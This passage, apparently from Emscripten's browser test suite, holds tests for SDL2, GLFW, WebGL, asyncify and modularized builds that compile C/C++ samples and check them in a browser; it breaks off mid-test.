@no_firefox('fails on CI likely due to GPU drivers there')
@requires_graphics_hardware
def test_webgl2_sokol_mrt(self):
self.btest(test_file('third_party/sokol/mrt-emcc.c'), args=['-sMAX_WEBGL_VERSION=2', '-lGL'],
reference=Path('third_party/sokol', 'mrt-emcc.png'))
@requires_graphics_hardware
def test_webgl2_sokol_arraytex(self):
self.btest(test_file('third_party/sokol/arraytex-emsc.c'), args=['-sMAX_WEBGL_VERSION=2', '-lGL'],
reference=Path('third_party/sokol', 'arraytex-emsc.png'))
def test_sdl_touch(self):
for opts in [[], ['-O2', '-g1', '--closure=1']]:
print(opts)
self.btest(test_file('sdl_touch.c'), args=opts + ['-DAUTOMATE_SUCCESS=1', '-lSDL', '-lGL'], expected='0')
def test_html5_mouse(self):
for opts in [[], ['-O2', '-g1', '--closure=1']]:
print(opts)
self.btest(test_file('test_html5_mouse.c'), args=opts + ['-DAUTOMATE_SUCCESS=1'], expected='0')
def test_sdl_mousewheel(self):
for opts in [[], ['-O2', '-g1', '--closure=1']]:
print(opts)
self.btest_exit(test_file('test_sdl_mousewheel.c'), args=opts + ['-DAUTOMATE_SUCCESS=1', '-lSDL', '-lGL'])
def test_wget(self):
create_file('test.txt', 'emscripten')
self.btest_exit(test_file('test_wget.c'), args=['-sASYNCIFY'])
def test_wget_data(self):
create_file('test.txt', 'emscripten')
self.btest_exit(test_file('test_wget_data.c'), args=['-O2', '-g2', '-sASYNCIFY'])
@parameterized({
'': ([],),
'es6': (['-sEXPORT_ES6=1'],),
})
def test_locate_file(self, args):
self.set_setting('EXIT_RUNTIME')
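    # Exercise both output modes (wasm and -sWASM=0), since locateFile determines where the runtime looks for the .wasm or .mem file it loads at startup.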
for wasm in [0, 1]:
self.clear()
create_file('src.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <assert.h>
int main() {
FILE *f = fopen("data.txt", "r");
assert(f && "could not open file");
char buf[100];
int num = fread(buf, 1, 20, f);
assert(num == 20 && "could not read 20 bytes");
buf[20] = 0;
fclose(f);
printf("|%s|\n", buf);
assert(strcmp("load me right before", buf) == 0);
return 0;
}
''')
create_file('data.txt', 'load me right before...')
create_file('pre.js', 'Module.locateFile = function(x) { return "sub/" + x };')
self.run_process([FILE_PACKAGER, 'test.data', '--preload', 'data.txt'], stdout=open('data.js', 'w'))
# put pre.js first, then the file packager data, so locateFile is there for the file loading code
self.compile_btest(['src.cpp', '-O2', '-g', '--pre-js', 'pre.js', '--pre-js', 'data.js', '-o', 'page.html', '-sFORCE_FILESYSTEM', '-sWASM=' + str(wasm)] + args, reporting=Reporting.JS_ONLY)
ensure_dir('sub')
if wasm:
shutil.move('page.wasm', Path('sub/page.wasm'))
else:
shutil.move('page.html.mem', Path('sub/page.html.mem'))
shutil.move('test.data', Path('sub/test.data'))
self.run_browser('page.html', None, '/report_result?exit:0')
# alternatively, put locateFile in the HTML
print('in html')
create_file('shell.html', '''
<body>
<script>
var Module = {
locateFile: function(x) { return "sub/" + x }
};
</script>
{{{ SCRIPT }}}
</body>
''')
def in_html(expected):
self.compile_btest(['src.cpp', '-O2', '-g', '--shell-file', 'shell.html', '--pre-js', 'data.js', '-o', 'page.html', '-sSAFE_HEAP', '-sASSERTIONS', '-sFORCE_FILESYSTEM', '-sWASM=' + str(wasm)] + args, reporting=Reporting.JS_ONLY)
if wasm:
shutil.move('page.wasm', Path('sub/page.wasm'))
else:
shutil.move('page.html.mem', Path('sub/page.html.mem'))
self.run_browser('page.html', None, '/report_result?exit:' + expected)
in_html('0')
# verify that the mem init request succeeded in the latter case
if not wasm:
create_file('src.cpp', r'''
#include <stdio.h>
#include <emscripten.h>
int main() {
int result = EM_ASM_INT({
return Module['memoryInitializerRequest'].status;
});
printf("memory init request: %d\n", result);
return result;
}
''')
in_html('200')
@requires_graphics_hardware
@parameterized({
'no_gl': (['-DCLIENT_API=GLFW_NO_API'],),
'gl_es': (['-DCLIENT_API=GLFW_OPENGL_ES_API'],)
})
def test_glfw3(self, args):
for opts in [[], ['-sLEGACY_GL_EMULATION'], ['-Os', '--closure=1']]:
print(opts)
self.btest(test_file('glfw3.c'), args=['-sUSE_GLFW=3', '-lglfw', '-lGL'] + args + opts, expected='1')
@requires_graphics_hardware
def test_glfw_events(self):
self.btest(test_file('glfw_events.c'), args=['-sUSE_GLFW=2', "-DUSE_GLFW=2", '-lglfw', '-lGL'], expected='1')
self.btest(test_file('glfw_events.c'), args=['-sUSE_GLFW=3', "-DUSE_GLFW=3", '-lglfw', '-lGL'], expected='1')
@requires_graphics_hardware
def test_sdl2_image(self):
    # load an image file, get pixel data. Also -O2 coverage for --preload-file and memory-init files
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.jpg')
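    # Cover both --memory-init-file modes and both --preload-file forms: a plain path, and the src@dst syntax that remaps the file into /assets.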
for mem in [0, 1]:
for dest, dirname, basename in [('screenshot.jpg', '/', 'screenshot.jpg'),
('screenshot.jpg@/assets/screenshot.jpg', '/assets', 'screenshot.jpg')]:
self.compile_btest([
test_file('sdl2_image.c'), '-o', 'page.html', '-O2', '--memory-init-file', str(mem),
'--preload-file', dest, '-DSCREENSHOT_DIRNAME="' + dirname + '"', '-DSCREENSHOT_BASENAME="' + basename + '"', '-sUSE_SDL=2', '-sUSE_SDL_IMAGE=2', '--use-preload-plugins'
])
self.run_browser('page.html', '', '/report_result?600')
@requires_graphics_hardware
def test_sdl2_image_jpeg(self):
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.jpeg')
self.compile_btest([
test_file('sdl2_image.c'), '-o', 'page.html',
'--preload-file', 'screenshot.jpeg', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.jpeg"', '-sUSE_SDL=2', '-sUSE_SDL_IMAGE=2', '--use-preload-plugins'
])
self.run_browser('page.html', '', '/report_result?600')
@requires_graphics_hardware
def test_sdl2_image_formats(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.jpg')
self.btest('sdl2_image.c', expected='512', args=['--preload-file', 'screenshot.png', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.png"',
'-DNO_PRELOADED', '-sUSE_SDL=2', '-sUSE_SDL_IMAGE=2', '-sSDL2_IMAGE_FORMATS=["png"]'])
self.btest('sdl2_image.c', expected='600', args=['--preload-file', 'screenshot.jpg', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.jpg"',
'-DBITSPERPIXEL=24', '-DNO_PRELOADED', '-sUSE_SDL=2', '-sUSE_SDL_IMAGE=2', '-sSDL2_IMAGE_FORMATS=["jpg"]'])
def test_sdl2_key(self):
create_file('pre.js', '''
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
var prevented = !document.dispatchEvent(event);
//send keypress if not prevented
if (!prevented) {
var event = new KeyboardEvent("keypress", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
}
function keyup(c) {
var event = new KeyboardEvent("keyup", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
''')
self.compile_btest([test_file('sdl2_key.c'), '-o', 'page.html', '-sUSE_SDL=2', '--pre-js', 'pre.js', '-sEXPORTED_FUNCTIONS=_main,_one'])
self.run_browser('page.html', '', '/report_result?37182145')
def test_sdl2_text(self):
create_file('pre.js', '''
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
function simulateKeyEvent(c) {
var event = new KeyboardEvent("keypress", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.body.dispatchEvent(event);
}
''')
self.compile_btest([test_file('sdl2_text.c'), '-o', 'page.html', '--pre-js', 'pre.js', '-sEXPORTED_FUNCTIONS=_main,_one', '-sUSE_SDL=2'])
self.run_browser('page.html', '', '/report_result?1')
@requires_graphics_hardware
def test_sdl2_mouse(self):
create_file('pre.js', '''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
self.compile_btest([test_file('sdl2_mouse.c'), '-O2', '--minify=0', '-o', 'page.html', '--pre-js', 'pre.js', '-sUSE_SDL=2'])
self.run_browser('page.html', '', '/report_result?1')
@requires_graphics_hardware
def test_sdl2_mouse_offsets(self):
create_file('pre.js', '''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, x, y, x, y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
create_file('page.html', '''
<html>
<head>
<style type="text/css">
html, body { margin: 0; padding: 0; }
#container {
position: absolute;
left: 5px; right: 0;
top: 5px; bottom: 0;
}
#canvas {
position: absolute;
left: 0; width: 600px;
top: 0; height: 450px;
}
textarea {
margin-top: 500px;
margin-left: 5px;
width: 600px;
}
</style>
</head>
<body>
<div id="container">
<canvas id="canvas"></canvas>
</div>
<textarea id="output" rows="8"></textarea>
<script type="text/javascript">
var Module = {
canvas: document.getElementById('canvas'),
print: (function() {
var element = document.getElementById('output');
element.value = ''; // clear browser cache
return function(text) {
if (arguments.length > 1) text = Array.prototype.slice.call(arguments).join(' ');
element.value += text + "\\n";
element.scrollTop = element.scrollHeight; // focus on bottom
};
})()
};
</script>
<script type="text/javascript" src="sdl2_mouse.js"></script>
</body>
</html>
''')
self.compile_btest([test_file('sdl2_mouse.c'), '-DTEST_SDL_MOUSE_OFFSETS=1', '-O2', '--minify=0', '-o', 'sdl2_mouse.js', '--pre-js', 'pre.js', '-sUSE_SDL=2'])
self.run_browser('page.html', '', '/report_result?1')
@requires_threads
def test_sdl2_threads(self):
self.btest('sdl2_threads.c', expected='4', args=['-sUSE_PTHREADS', '-sUSE_SDL=2', '-sPROXY_TO_PTHREAD'])
@requires_graphics_hardware
def test_sdl2glshader(self):
self.btest('sdl2glshader.c', reference='sdlglshader.png', args=['-sUSE_SDL=2', '-O2', '--closure=1', '-g1', '-sLEGACY_GL_EMULATION'])
self.btest('sdl2glshader.c', reference='sdlglshader.png', args=['-sUSE_SDL=2', '-O2', '-sLEGACY_GL_EMULATION'], also_proxied=True) # XXX closure fails on proxy
@requires_graphics_hardware
def test_sdl2_canvas_blank(self):
self.btest('sdl2_canvas_blank.c', reference='sdl_canvas_blank.png', args=['-sUSE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_canvas_palette(self):
self.btest('sdl2_canvas_palette.c', reference='sdl_canvas_palette.png', args=['-sUSE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_canvas_twice(self):
self.btest('sdl2_canvas_twice.c', reference='sdl_canvas_twice.png', args=['-sUSE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_gfx(self):
self.btest('sdl2_gfx.cpp', args=['-sUSE_SDL=2', '-sUSE_SDL_GFX=2'], reference='sdl2_gfx.png', reference_slack=2)
@requires_graphics_hardware
def test_sdl2_canvas_palette_2(self):
create_file('args-r.js', '''
Module['arguments'] = ['-r'];
''')
create_file('args-g.js', '''
Module['arguments'] = ['-g'];
''')
create_file('args-b.js', '''
Module['arguments'] = ['-b'];
''')
self.btest('sdl2_canvas_palette_2.c', reference='sdl_canvas_palette_r.png', args=['-sUSE_SDL=2', '--pre-js', 'args-r.js'])
self.btest('sdl2_canvas_palette_2.c', reference='sdl_canvas_palette_g.png', args=['-sUSE_SDL=2', '--pre-js', 'args-g.js'])
self.btest('sdl2_canvas_palette_2.c', reference='sdl_canvas_palette_b.png', args=['-sUSE_SDL=2', '--pre-js', 'args-b.js'])
def test_sdl2_swsurface(self):
self.btest('sdl2_swsurface.c', expected='1', args=['-sUSE_SDL=2', '-sINITIAL_MEMORY=64MB'])
@requires_graphics_hardware
def test_sdl2_image_prepare(self):
# load an image file, get pixel data.
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.not')
self.btest('sdl2_image_prepare.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-sUSE_SDL=2', '-sUSE_SDL_IMAGE=2'], manually_trigger_reftest=True)
@requires_graphics_hardware
def test_sdl2_image_prepare_data(self):
# load an image file, get pixel data.
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.not')
self.btest('sdl2_image_prepare_data.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-sUSE_SDL=2', '-sUSE_SDL_IMAGE=2'], manually_trigger_reftest=True)
@requires_graphics_hardware
def test_sdl2_canvas_proxy(self):
def post():
html = read_file('test.html')
html = html.replace('</body>', '''
<script>
function assert(x, y) { if (!x) throw 'assertion failed ' + y }
%s
var windowClose = window.close;
window.close = function() {
// wait for rafs to arrive and the screen to update before reftesting
setTimeout(function() {
doReftest();
setTimeout(windowClose, 5000);
}, 1000);
};
</script>
</body>''' % read_file('reftest.js'))
create_file('test.html', html)
create_file('data.txt', 'datum')
self.btest('sdl2_canvas_proxy.c', reference='sdl2_canvas.png', args=['-sUSE_SDL=2', '--proxy-to-worker', '--preload-file', 'data.txt', '-sGL_TESTING'], manual_reference=True, post_build=post)
def test_sdl2_pumpevents(self):
# key events should be detected using SDL_PumpEvents
create_file('pre.js', '''
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
''')
self.btest('sdl2_pumpevents.c', expected='7', args=['--pre-js', 'pre.js', '-sUSE_SDL=2'])
def test_sdl2_timer(self):
self.btest('sdl2_timer.c', expected='5', args=['-sUSE_SDL=2'])
def test_sdl2_canvas_size(self):
self.btest('sdl2_canvas_size.c', expected='1', args=['-sUSE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_gl_read(self):
# SDL, OpenGL, readPixels
self.compile_btest([test_file('sdl2_gl_read.c'), '-o', 'something.html', '-sUSE_SDL=2'])
self.run_browser('something.html', '.', '/report_result?1')
@requires_graphics_hardware
def test_sdl2_glmatrixmode_texture(self):
self.btest('sdl2_glmatrixmode_texture.c', reference='sdl2_glmatrixmode_texture.png',
args=['-sLEGACY_GL_EMULATION', '-sUSE_SDL=2'],
message='You should see a (top) red-white and (bottom) white-red image.')
@requires_graphics_hardware
def test_sdl2_gldrawelements(self):
self.btest('sdl2_gldrawelements.c', reference='sdl2_gldrawelements.png',
args=['-sLEGACY_GL_EMULATION', '-sUSE_SDL=2'],
message='GL drawing modes. Bottom: points, lines, line loop, line strip. Top: triangles, triangle strip, triangle fan, quad.')
@requires_graphics_hardware
def test_sdl2_glclipplane_gllighting(self):
self.btest('sdl2_glclipplane_gllighting.c', reference='sdl2_glclipplane_gllighting.png',
args=['-sLEGACY_GL_EMULATION', '-sUSE_SDL=2'],
message='glClipPlane and GL_LIGHTING emulation. You should see a torus cut open on one side with lighting from one lightsource applied.')
@requires_graphics_hardware
def test_sdl2_glalphatest(self):
self.btest('sdl2_glalphatest.c', reference='sdl2_glalphatest.png',
args=['-sLEGACY_GL_EMULATION', '-sUSE_SDL=2'],
message='GL_ALPHA_TEST emulation. You should see gradients with different alpha testing modes and reference values.')
@requires_graphics_hardware
def test_sdl2_fog_simple(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl2_fog_simple.c', reference='screenshot-fog-simple.png',
args=['-sUSE_SDL=2', '-sUSE_SDL_IMAGE=2', '-O2', '--minify=0', '--preload-file', 'screenshot.png', '-sLEGACY_GL_EMULATION', '--use-preload-plugins'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl2_fog_negative(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl2_fog_negative.c', reference='screenshot-fog-negative.png',
args=['-sUSE_SDL=2', '-sUSE_SDL_IMAGE=2', '--preload-file', 'screenshot.png', '-sLEGACY_GL_EMULATION', '--use-preload-plugins'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl2_fog_density(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl2_fog_density.c', reference='screenshot-fog-density.png',
args=['-sUSE_SDL=2', '-sUSE_SDL_IMAGE=2', '--preload-file', 'screenshot.png', '-sLEGACY_GL_EMULATION', '--use-preload-plugins'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl2_fog_exp2(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl2_fog_exp2.c', reference='screenshot-fog-exp2.png',
args=['-sUSE_SDL=2', '-sUSE_SDL_IMAGE=2', '--preload-file', 'screenshot.png', '-sLEGACY_GL_EMULATION', '--use-preload-plugins'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl2_fog_linear(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl2_fog_linear.c', reference='screenshot-fog-linear.png', reference_slack=1,
args=['-sUSE_SDL=2', '-sUSE_SDL_IMAGE=2', '--preload-file', 'screenshot.png', '-sLEGACY_GL_EMULATION', '--use-preload-plugins'],
message='You should see an image with fog.')
def test_sdl2_unwasteful(self):
self.btest('sdl2_unwasteful.cpp', expected='1', args=['-sUSE_SDL=2', '-O1'])
def test_sdl2_canvas_write(self):
self.btest('sdl2_canvas_write.cpp', expected='0', args=['-sUSE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_gl_frames_swap(self):
def post_build(*args):
self.post_manual_reftest(*args)
html = read_file('test.html')
html2 = html.replace('''Module['postRun'] = doReftest;''', '') # we don't want the very first frame
assert html != html2
create_file('test.html', html2)
self.btest('sdl2_gl_frames_swap.c', reference='sdl2_gl_frames_swap.png', args=['--proxy-to-worker', '-sGL_TESTING', '-sUSE_SDL=2'], manual_reference=True, post_build=post_build)
@requires_graphics_hardware
def test_sdl2_ttf(self):
shutil.copy2(test_file('freetype/LiberationSansBold.ttf'), self.get_dir())
self.btest('sdl2_ttf.c', reference='sdl2_ttf.png',
args=['-O2', '-sUSE_SDL=2', '-sUSE_SDL_TTF=2', '--embed-file', 'LiberationSansBold.ttf'],
message='You should see colorful "hello" and "world" in the window')
@requires_graphics_hardware
def test_sdl2_ttf_rtl(self):
shutil.copy2(test_file('third_party/notofont/NotoNaskhArabic-Regular.ttf'), self.get_dir())
self.btest('sdl2_ttf_rtl.c', reference='sdl2_ttf_rtl.png',
args=['-O2', '-sUSE_SDL=2', '-sUSE_SDL_TTF=2', '--embed-file', 'NotoNaskhArabic-Regular.ttf'],
message='You should see colorful "سلام" and "جهان" with shaped Arabic script in the window')
def test_sdl2_custom_cursor(self):
shutil.copyfile(test_file('cursor.bmp'), 'cursor.bmp')
self.btest('sdl2_custom_cursor.c', expected='1', args=['--preload-file', 'cursor.bmp', '-sUSE_SDL=2'])
def test_sdl2_misc(self):
self.btest_exit('sdl2_misc.c', args=['-sUSE_SDL=2'])
def test_sdl2_misc_main_module(self):
self.btest_exit('sdl2_misc.c', args=['-sUSE_SDL=2', '-sMAIN_MODULE'])
def test_sdl2_misc_via_object(self):
self.run_process([EMCC, '-c', test_file('sdl2_misc.c'), '-sUSE_SDL=2', '-o', 'test.o'])
self.compile_btest(['test.o', '-sEXIT_RUNTIME', '-sUSE_SDL=2', '-o', 'test.html'])
self.run_browser('test.html', '...', '/report_result?exit:0')
@parameterized({
'dash_s': (['-sUSE_SDL=2', '-sUSE_SDL_MIXER=2'],),
'dash_l': (['-lSDL2', '-lSDL2_mixer'],),
})
@requires_sound_hardware
def test_sdl2_mixer_wav(self, flags):
shutil.copyfile(test_file('sounds/the_entertainer.wav'), 'sound.wav')
self.btest('sdl2_mixer_wav.c', expected='1', args=['--preload-file', 'sound.wav', '-sINITIAL_MEMORY=33554432'] + flags)
@parameterized({
'wav': ([], '0', 'the_entertainer.wav'),
'ogg': (['ogg'], 'MIX_INIT_OGG', 'alarmvictory_1.ogg'),
'mp3': (['mp3'], 'MIX_INIT_MP3', 'pudinha.mp3'),
'mod': (['mod'], 'MIX_INIT_MOD', 'bleep.xm'),
# TODO: need to source freepats.cfg and a midi file
# 'mod': (['mid'], 'MIX_INIT_MID', 'midi.mid'),
})
@requires_sound_hardware
def test_sdl2_mixer_music(self, formats, flags, music_name):
shutil.copyfile(test_file('sounds', music_name), music_name)
self.btest('sdl2_mixer_music.c', expected='1', args=[
'--preload-file', music_name,
'-DSOUND_PATH=' + json.dumps(music_name),
'-DFLAGS=' + flags,
'-sUSE_SDL=2',
'-sUSE_SDL_MIXER=2',
'-sSDL2_MIXER_FORMATS=' + json.dumps(formats),
'-sINITIAL_MEMORY=33554432'
])
@requires_graphics_hardware
def test_cocos2d_hello(self):
cocos2d_root = os.path.join(ports.Ports.get_build_dir(), 'cocos2d')
preload_file = os.path.join(cocos2d_root, 'samples', 'HelloCpp', 'Resources') + '@'
self.btest('cocos2d_hello.cpp', reference='cocos2d_hello.png', reference_slack=1,
args=['-sUSE_COCOS2D=3', '-sERROR_ON_UNDEFINED_SYMBOLS=0',
'--preload-file', preload_file, '--use-preload-plugins',
'-Wno-inconsistent-missing-override'],
message='You should see Cocos2d logo')
def test_async(self):
for opts in [0, 1, 2, 3]:
print(opts)
self.btest_exit('browser/async.cpp', args=['-O' + str(opts), '-g2', '-sASYNCIFY'])
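# A minimal, hypothetical sketch (not one of the original tests) of the pattern
# the ASYNCIFY tests above exercise: with -sASYNCIFY, emscripten_sleep()
# unwinds the wasm stack, returns control to the browser event loop, and later
# rewinds to resume execution where the C code left off.
def test_async_sleep_sketch(self):
  create_file('sleep.c', r'''
    #include <stdio.h>
    #include <emscripten.h>
    int main() {
      printf("before sleep\n");
      emscripten_sleep(100); // suspends via asyncify; the page stays responsive
      printf("after sleep\n");
      return 0;
    }
  ''')
  self.btest_exit(self.in_dir('sleep.c'), args=['-sASYNCIFY'])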
def test_asyncify_tricky_function_sig(self):
self.btest('browser/test_asyncify_tricky_function_sig.cpp', '85', args=['-sASYNCIFY_ONLY=[foo(char.const*?.int#),foo2(),main,__original_main]', '-sASYNCIFY=1'])
@requires_threads
def test_async_in_pthread(self):
self.btest_exit('browser/async.cpp', args=['-sASYNCIFY', '-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD', '-g'])
def test_async_2(self):
# Error.stackTraceLimit defaults to 10 in Chrome, but this test relies on more
# than 40 stack frames being reported.
create_file('pre.js', 'Error.stackTraceLimit = 80;\n')
self.btest_exit('browser/async_2.cpp', args=['-O3', '--pre-js', 'pre.js', '-sASYNCIFY'])
def test_async_virtual(self):
for opts in [0, 3]:
print(opts)
self.btest_exit('browser/async_virtual.cpp', args=['-O' + str(opts), '-profiling', '-sASYNCIFY'])
def test_async_virtual_2(self):
for opts in [0, 3]:
print(opts)
self.btest_exit('browser/async_virtual_2.cpp', args=['-O' + str(opts), '-sASSERTIONS', '-sSAFE_HEAP', '-profiling', '-sASYNCIFY'])
# Test async sleeps in the presence of invoke_* calls, which can happen with
# longjmp or exceptions.
@parameterized({
'O0': ([],), # noqa
'O3': (['-O3'],), # noqa
})
def test_async_longjmp(self, args):
self.btest_exit('browser/async_longjmp.cpp', args=args + ['-sASYNCIFY'])
def test_async_mainloop(self):
for opts in [0, 3]:
print(opts)
self.btest_exit('browser/async_mainloop.cpp', args=['-O' + str(opts), '-sASYNCIFY'])
@requires_sound_hardware
def test_sdl_audio_beep_sleep(self):
self.btest('sdl_audio_beep_sleep.cpp', '1', args=['-Os', '-sASSERTIONS', '-sDISABLE_EXCEPTION_CATCHING=0', '-profiling', '-sSAFE_HEAP', '-lSDL', '-sASYNCIFY'], timeout=90)
def test_mainloop_reschedule(self):
self.btest('mainloop_reschedule.cpp', '1', args=['-Os', '-sASYNCIFY'])
def test_mainloop_infloop(self):
self.btest('mainloop_infloop.cpp', '1', args=['-sASYNCIFY'])
def test_async_iostream(self):
self.btest('browser/async_iostream.cpp', '1', args=['-sASYNCIFY'])
# Test an async return value. The value goes through a custom JS library
# method that uses asyncify, and therefore it needs to be declared in
# ASYNCIFY_IMPORTS.
# To make the test more precise we also use ASYNCIFY_IGNORE_INDIRECT here.
@parameterized({
'normal': (['-sASYNCIFY_IMPORTS=[sync_tunnel, sync_tunnel_bool]'],), # noqa
'response': (['-sASYNCIFY_IMPORTS=@filey.txt'],), # noqa
'nothing': (['-DBAD'],), # noqa
'empty_list': (['-DBAD', '-sASYNCIFY_IMPORTS=[]'],), # noqa
'em_js_bad': (['-DBAD', '-DUSE_EM_JS'],), # noqa
})
def test_async_returnvalue(self, args):
if '@' in str(args):
create_file('filey.txt', 'sync_tunnel\nsync_tunnel_bool\n')
self.btest('browser/async_returnvalue.cpp', '0', args=['-sASYNCIFY', '-sASYNCIFY_IGNORE_INDIRECT', '--js-library', test_file('browser/async_returnvalue.js')] + args + ['-sASSERTIONS'])
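# A minimal, hypothetical sketch (not one of the original tests) of an
# asyncified JS library import like the sync_tunnel used above: the import is
# listed in ASYNCIFY_IMPORTS so the compiler knows it may unwind the stack, and
# the value passed to wakeUp() in Asyncify.handleSleep() becomes the C-visible
# return value.
def test_async_returnvalue_sketch(self):
  create_file('tunnel.js', '''
    mergeInto(LibraryManager.library, {
      js_tunnel: function(value) {
        // Suspend the wasm caller, then resume it with value + 1.
        return Asyncify.handleSleep((wakeUp) => {
          setTimeout(() => wakeUp(value + 1), 0);
        });
      },
    });
  ''')
  create_file('tunnel.c', r'''
    #include <assert.h>
    int js_tunnel(int value);
    int main() {
      assert(js_tunnel(41) == 42);
      return 0;
    }
  ''')
  self.btest_exit(self.in_dir('tunnel.c'),
                  args=['-sASYNCIFY', '-sASYNCIFY_IMPORTS=[js_tunnel]',
                        '--js-library', 'tunnel.js'])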
def test_async_stack_overflow(self):
self.btest('browser/async_stack_overflow.cpp', 'abort:RuntimeError: unreachable', args=['-sASYNCIFY', '-sASYNCIFY_STACK_SIZE=4'])
def test_async_bad_list(self):
self.btest('browser/async_bad_list.cpp', '0', args=['-sASYNCIFY', '-sASYNCIFY_ONLY=[waka]', '--profiling'])
# Tests that when building with -sMINIMAL_RUNTIME, the build can use -sMODULARIZE as well.
def test_minimal_runtime_modularize(self):
self.compile_btest([test_file('browser_test_hello_world.c'), '-o', 'test.html', '-sMODULARIZE', '-sMINIMAL_RUNTIME'])
self.run_browser('test.html', None, '/report_result?0')
# Tests that when building with -sMINIMAL_RUNTIME, the build can use -sEXPORT_NAME=Foo as well.
def test_minimal_runtime_export_name(self):
self.compile_btest([test_file('browser_test_hello_world.c'), '-o', 'test.html', '-sEXPORT_NAME=Foo', '-sMINIMAL_RUNTIME'])
self.run_browser('test.html', None, '/report_result?0')
@requires_sync_compilation
def test_modularize(self):
for opts in [
[],
['-O1'],
['-O2', '-profiling'],
['-O2'],
['-O2', '--closure=1']
]:
for args, code in [
# defaults
([], '''
let promise = Module();
if (!(promise instanceof Promise)) throw new Error('Return value should be a promise');
'''),
# use EXPORT_NAME
(['-sEXPORT_NAME="HelloWorld"'], '''
if (typeof Module !== "undefined") throw "what?!"; // do not pollute the global scope, we are modularized!
HelloWorld.noInitialRun = true; // erroneous module capture will load this and cause timeout
let promise = HelloWorld();
if (!(promise instanceof Promise)) throw new Error('Return value should be a promise');
'''),
# pass in a Module option (which prevents main(), which we then invoke ourselves)
(['-sEXPORT_NAME="HelloWorld"'], '''
HelloWorld({ noInitialRun: true }).then(hello => {
hello._main();
});
'''),
# Even without a mem init file, everything is async
(['-sEXPORT_NAME="HelloWorld"', '--memory-init-file', '0'], '''
HelloWorld({ noInitialRun: true }).then(hello => {
hello._main();
});
'''),
]:
print('test on', opts, args, code)
# this test is synchronous, so avoid async startup due to wasm features
self.compile_btest([test_file('browser_test_hello_world.c'), '-sMODULARIZE', '-sSINGLE_FILE'] + args + opts)
create_file('a.html', '''
<script src="a.out.js"></script>
<script>
%s
</script>
''' % code)
self.run_browser('a.html', '...', '/report_result?0')
def test_modularize_network_error(self):
test_c_path = test_file('browser_test_hello_world.c')
browser_reporting_js_path = test_file('browser_reporting.js')
self.compile_btest([test_c_path, '-sMODULARIZE', '-sEXPORT_NAME="createModule"', '--extern-pre-js', browser_reporting_js_path], reporting=Reporting.NONE)
create_file('a.html', '''
